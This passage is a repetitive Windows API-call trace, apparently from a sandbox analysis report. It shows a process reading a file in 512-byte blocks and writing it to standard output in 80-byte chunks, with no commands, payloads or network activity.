nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.070] GetFileType (hFile=0x50) returned 0x1 [0193.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.070] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.070] GetFileType (hFile=0x50) returned 0x1 [0193.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.070] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.070] GetFileType (hFile=0x50) returned 0x1 [0193.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.070] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.070] GetFileType (hFile=0x50) returned 0x1 [0193.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.070] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.070] GetFileType (hFile=0x50) returned 0x1 [0193.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.070] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.071] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.071] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.071] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.071] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.071] GetFileType (hFile=0x50) returned 0x1 [0193.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.071] GetFileType (hFile=0x50) returned 0x1 [0193.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.071] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.071] GetFileType (hFile=0x50) returned 0x1 [0193.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.071] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.071] GetFileType (hFile=0x50) returned 0x1 [0193.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.071] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.071] GetFileType (hFile=0x50) returned 0x1 [0193.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.071] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.071] GetFileType (hFile=0x50) returned 0x1 [0193.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.071] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.071] GetFileType (hFile=0x50) returned 0x1 [0193.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.072] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.072] GetFileType (hFile=0x50) returned 0x1 [0193.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.072] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.072] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.072] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.072] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.072] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.072] GetFileType (hFile=0x50) returned 0x1 [0193.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.072] GetFileType (hFile=0x50) returned 0x1 [0193.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.072] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.072] GetFileType (hFile=0x50) returned 0x1 [0193.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.072] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.072] GetFileType (hFile=0x50) returned 0x1 [0193.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.072] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.072] GetFileType (hFile=0x50) returned 0x1 [0193.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.072] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.072] GetFileType (hFile=0x50) returned 0x1 [0193.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.072] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.073] GetFileType (hFile=0x50) returned 0x1 [0193.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.073] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.073] GetFileType (hFile=0x50) returned 0x1 [0193.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.073] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.073] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.073] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.073] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.073] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.073] GetFileType (hFile=0x50) returned 0x1 [0193.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.073] GetFileType (hFile=0x50) returned 0x1 [0193.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.073] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.073] GetFileType (hFile=0x50) returned 0x1 [0193.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.073] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.073] GetFileType (hFile=0x50) returned 0x1 [0193.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.073] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.073] GetFileType (hFile=0x50) returned 0x1 [0193.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.073] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.073] GetFileType (hFile=0x50) returned 0x1 [0193.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.073] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.074] GetFileType (hFile=0x50) returned 0x1 [0193.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.074] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.074] GetFileType (hFile=0x50) returned 0x1 [0193.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.074] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.074] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.074] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.074] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.074] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.074] GetFileType (hFile=0x50) returned 0x1 [0193.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.074] GetFileType (hFile=0x50) returned 0x1 [0193.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.074] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.074] GetFileType (hFile=0x50) returned 0x1 [0193.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.074] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.074] GetFileType (hFile=0x50) returned 0x1 [0193.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.074] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.074] GetFileType (hFile=0x50) returned 0x1 [0193.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.074] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.074] GetFileType (hFile=0x50) returned 0x1 [0193.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.074] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.075] GetFileType (hFile=0x50) returned 0x1 [0193.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.075] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.075] GetFileType (hFile=0x50) returned 0x1 [0193.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.075] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.075] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.075] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.075] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.075] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.075] GetFileType (hFile=0x50) returned 0x1 [0193.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.075] GetFileType (hFile=0x50) returned 0x1 [0193.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.075] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.075] GetFileType (hFile=0x50) returned 0x1 [0193.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.075] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.075] GetFileType (hFile=0x50) returned 0x1 [0193.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.075] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.075] GetFileType (hFile=0x50) returned 0x1 [0193.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.075] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.075] GetFileType (hFile=0x50) returned 0x1 [0193.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.076] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.076] GetFileType (hFile=0x50) returned 0x1 [0193.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.076] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.076] GetFileType (hFile=0x50) returned 0x1 [0193.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.076] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.076] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.076] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.076] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.076] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.076] GetFileType (hFile=0x50) returned 0x1 [0193.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.076] GetFileType (hFile=0x50) returned 0x1 [0193.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.076] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.076] GetFileType (hFile=0x50) returned 0x1 [0193.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.076] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.076] GetFileType (hFile=0x50) returned 0x1 [0193.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.076] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.076] GetFileType (hFile=0x50) returned 0x1 [0193.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.076] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.076] GetFileType (hFile=0x50) returned 0x1 [0193.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.077] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.077] GetFileType (hFile=0x50) returned 0x1 [0193.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.077] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.077] GetFileType (hFile=0x50) returned 0x1 [0193.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.077] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.077] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.077] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.077] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.077] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.077] GetFileType (hFile=0x50) returned 0x1 [0193.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.077] GetFileType (hFile=0x50) returned 0x1 [0193.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.077] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.077] GetFileType (hFile=0x50) returned 0x1 [0193.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.077] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.077] GetFileType (hFile=0x50) returned 0x1 [0193.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.077] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.077] GetFileType (hFile=0x50) returned 0x1 [0193.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.077] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.077] GetFileType (hFile=0x50) returned 0x1 [0193.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.078] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.078] GetFileType (hFile=0x50) returned 0x1 [0193.078] _get_osfhandle (_FileHandle=1) returned 0x50 